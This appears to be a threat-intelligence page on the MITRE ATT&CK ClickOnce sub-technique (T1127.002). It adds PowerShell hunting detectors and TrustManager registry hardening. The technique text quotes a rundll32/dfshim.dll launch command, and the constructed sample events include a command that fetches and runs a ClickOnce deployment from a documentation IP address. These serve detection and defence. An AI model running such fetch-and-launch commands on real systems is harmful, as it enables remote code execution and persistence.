Description
Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment technology that lets a developer publish self-updating Windows-based .NET applications (i.e., .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The installed application launches as a child process of DFSVC.EXE, the ClickOnce service that is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
ClickOnce may be abused in a number of ways. For example, an adversary may rely on User Execution: when a user visits a malicious website, .NET malware disguised as legitimate software is offered through the ClickOnce install prompt, and the user's click completes the installation.(Citation: NetSPI ClickOnce)
Adversaries may also abuse ClickOnce to execute malware through Rundll32, using the command rundll32.exe dfshim.dll,ShOpenVerbApplication1 to have the ClickOnce handler in dfshim.dll fetch and launch a deployment.(Citation: LOLBAS /Dfsvc.exe)
Additionally, an adversary can place the ClickOnce application file (.appref-ms) in a user's Startup folder so that the deployment is launched, and re-fetched from its deployment URL, at every logon (i.e., Registry Run Keys / Startup Folder).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
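The three abuse patterns above (a process spawned by dfsvc.exe, rundll32 invoking dfshim.dll, and a ClickOnce file in a Startup folder) map directly onto process-creation telemetry. The PowerShell below is an added hunting example written for this page; it is not code from ATT&CK or from any of the cited authors. The event field names (UtcTime, Image, ParentImage, CommandLine) mirror Sysmon Event ID 1 but are an assumption about your telemetry, the sample events are constructed, and the function names are mine.

```powershell
# Added example (not from the ATT&CK page): flag process-creation events that
# match the ClickOnce abuse patterns described in the technique text.
function Find-ClickOnceAbuse {
    param([Parameter(Mandatory)][object[]]$Events)

    foreach ($e in $Events) {
        $reasons = @()
        $cmd    = [string]$e.CommandLine
        $parent = [string]$e.ParentImage

        # 1. Anything whose parent is dfsvc.exe was launched by ClickOnce.
        if ($parent -match '\\dfsvc\.exe$') {
            $reasons += 'child of dfsvc.exe (ClickOnce launch)'
        }
        # 2. LOLBAS launch through the dfshim.dll handler. ShOpenVerb* covers
        #    ShOpenVerbApplication (.application) and ShOpenVerbShortcut (.appref-ms).
        if ($cmd -match 'rundll32(\.exe)?["\s].*dfshim\.dll"?,\s*ShOpenVerb\w*') {
            $reasons += 'rundll32 dfshim.dll ShOpenVerb* handler'
        }
        # 3. ClickOnce deployment file being launched from a Startup folder.
        if ($cmd -match '\\Startup\\[^"]*\.(appref-ms|application)\b') {
            $reasons += '.appref-ms/.application in Startup folder'
        }
        # 4. Deployment pulled straight from a URL: worth checking the host.
        if ($cmd -match 'https?://\S+\.(application|appref-ms)\b') {
            $reasons += 'remote .application/.appref-ms URL'
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Time    = $e.UtcTime
                Image   = $e.Image
                Parent  = $parent
                Reasons = ($reasons -join '; ')
                Command = $cmd
            }
        }
    }
}

# Hunt the per-user and all-users Startup folders for ClickOnce files and pull
# the deployment URL out of each .appref-ms (a UTF-16 text file whose first
# line is "<deployment URL>#<app identity>").
function Get-StartupClickOnceFiles {
    $paths = @("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup") +
        (Get-ChildItem "$env:SystemDrive\Users" -Directory -ErrorAction SilentlyContinue |
         ForEach-Object { "$($_.FullName)\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" })

    Get-ChildItem -Path $paths -Include '*.appref-ms','*.application' -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $url = $null
            if ($_.Extension -eq '.appref-ms') {
                $url = ((Get-Content $_.FullName -Encoding Unicode -TotalCount 1) -split '#')[0]
            }
            [pscustomobject]@{ File = $_.FullName; LastWrite = $_.LastWriteTime; DeploymentUrl = $url }
        }
}

# Constructed sample events (not real telemetry). 198.51.100.7 is a documentation address.
$sample = @(
    [pscustomobject]@{ UtcTime='2024-09-09 10:00:01'; Image='C:\Windows\System32\rundll32.exe'
        ParentImage='C:\Windows\explorer.exe'
        CommandLine='rundll32.exe dfshim.dll,ShOpenVerbApplication http://198.51.100.7/update/Updater.application' }
    [pscustomobject]@{ UtcTime='2024-09-09 10:00:03'; Image='C:\Users\alice\AppData\Local\Apps\2.0\ABCD\Updater.exe'
        ParentImage='C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe'
        CommandLine='"C:\Users\alice\AppData\Local\Apps\2.0\ABCD\Updater.exe"' }
    [pscustomobject]@{ UtcTime='2024-09-09 10:05:00'; Image='C:\Windows\System32\rundll32.exe'
        ParentImage='C:\Windows\explorer.exe'
        CommandLine='"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbShortcut "C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.appref-ms"' }
    [pscustomobject]@{ UtcTime='2024-09-09 10:06:00'; Image='C:\Windows\System32\notepad.exe'
        ParentImage='C:\Windows\explorer.exe'; CommandLine='notepad.exe C:\temp\notes.txt' }
)

Find-ClickOnceAbuse -Events $sample | Format-List   # first three events are flagged, notepad is not
Get-StartupClickOnceFiles | Format-Table -AutoSize    # live check of this host's Startup folders
```

Pattern 1 is the highest-signal check because every ClickOnce-launched application is a child of dfsvc.exe, but it also fires on legitimate ClickOnce software in the environment; baseline the deployment URLs and the signing publisher before alerting on it. Patterns 2 to 4 cover the LOLBAS and Startup-folder routes and are rare in most enterprises.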
Mitigations (3)
Disable or Remove Feature or Program (M1042)
Disable ClickOnce installations from the Internet zone by setting the REG_SZ value Internet to Disabled under the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Security\TrustManager\PromptingLevel(Citation: NetSPI ClickOnce)(Citation: Microsoft Learn ClickOnce Config)
ClickOnce may not be necessary within an environment and should be disabled if not being used.
Restrict Web-Based Content (M1021)
Block web-delivered ClickOnce deployments by setting the REG_SZ value Internet to Disabled under the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Security\TrustManager\PromptingLevel(Citation: NetSPI ClickOnce)
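Both mitigations above turn on the same TrustManager setting. The PowerShell below is an added example written for this page, not code from ATT&CK, NetSPI or Microsoft: it audits every zone under the PromptingLevel key and then applies the Internet:Disabled setting. The zone names (MyComputer, LocalIntranet, Internet, TrustedSites, UntrustedSites) and the levels (Enabled, AllowRun, Disabled) are Microsoft's documented values; the function names are mine. Run it elevated, since the key lives under HKLM.

```powershell
# Added example (not from the ATT&CK page): audit and set the ClickOnce
# TrustManager prompting level per security zone.
$Key = 'HKLM:\SOFTWARE\Microsoft\.NETFramework\Security\TrustManager\PromptingLevel'

function Get-ClickOncePromptingLevel {
    # One object per zone. A missing value means the .NET default applies;
    # the default for Internet is Enabled, i.e. the install prompt is shown.
    $zones = 'MyComputer','LocalIntranet','Internet','TrustedSites','UntrustedSites'
    foreach ($zone in $zones) {
        $value = $null
        if (Test-Path $Key) {
            $value = (Get-ItemProperty -Path $Key -Name $zone -ErrorAction SilentlyContinue).$zone
        }
        if (-not $value) { $value = '<not set (default)>' }
        [pscustomobject]@{ Zone = $zone; PromptingLevel = $value }
    }
}

function Set-ClickOncePromptingLevel {
    param(
        [Parameter(Mandatory)]
        [ValidateSet('MyComputer','LocalIntranet','Internet','TrustedSites','UntrustedSites')]
        [string]$Zone,
        [Parameter(Mandatory)]
        [ValidateSet('Enabled','AllowRun','Disabled')]
        [string]$Level
    )
    # The key does not exist on a default install; create it on first use.
    if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    # Each zone is a REG_SZ value whose data is the prompting level.
    New-ItemProperty -Path $Key -Name $Zone -Value $Level -PropertyType String -Force | Out-Null
}

'Before:'; Get-ClickOncePromptingLevel | Format-Table -AutoSize

# The mitigation on this page: no ClickOnce installs from the Internet zone.
Set-ClickOncePromptingLevel -Zone Internet -Level Disabled
# Assumption beyond the page: an environment that does not use ClickOnce at
# all can disable the remaining network-facing zones as well.
Set-ClickOncePromptingLevel -Zone UntrustedSites -Level Disabled

'After:'; Get-ClickOncePromptingLevel | Format-Table -AutoSize
```

Verify the change with the audit function rather than by trusting the write: the value is read by the ClickOnce TrustManager at install time, so test the effect against a known ClickOnce deployment in a lab before rolling it out. On 64-bit hosts that still run 32-bit .NET Framework applications, also check whether the Wow6432Node copy of the key is consulted in your environment.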
Code Signing (M1045)
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.(Citation: Microsoft Learn ClickOnce and Authenticode)
References
- LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
- Microsoft. (2023, September 14). ClickOnce security and deployment. Retrieved September 9, 2024.
- Nick Powers. (2023, June 7). Less SmartScreen More Caffeine: (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.
- Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce Love Story. Retrieved September 9, 2024.
- William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution & C2. Retrieved September 9, 2024.
- William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE IN: When .appref-ms abuse is operating as intended. Retrieved September 9, 2024.
Frequently Asked Questions
What is T1127.002 (ClickOnce)?
T1127.002 is a MITRE ATT&CK sub-technique named 'ClickOnce', a sub-technique of T1127 (Trusted Developer Utilities Proxy Execution). It belongs to the Defense Evasion tactic. Adversaries use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility; see the Description above.
How can T1127.002 be detected?
Detection of T1127.002 (ClickOnce) relies on process-creation and command-line telemetry: look for processes whose parent is dfsvc.exe, for rundll32.exe invoking dfshim.dll (ShOpenVerbApplication), and for .appref-ms or .application files written to or launched from Startup folders. Correlate hits with the deployment URL in the ClickOnce file and with the publisher's code signature so that known-good internal deployments can be baselined.
What mitigations exist for T1127.002?
There are 3 documented mitigations for T1127.002. Key mitigations include: Disable or Remove Feature or Program, Restrict Web-Based Content, Code Signing.
Which threat groups use T1127.002?
While specific threat group attribution may vary, this technique has been observed in various real-world attacks. Check the MITRE ATT&CK website for the latest threat intelligence.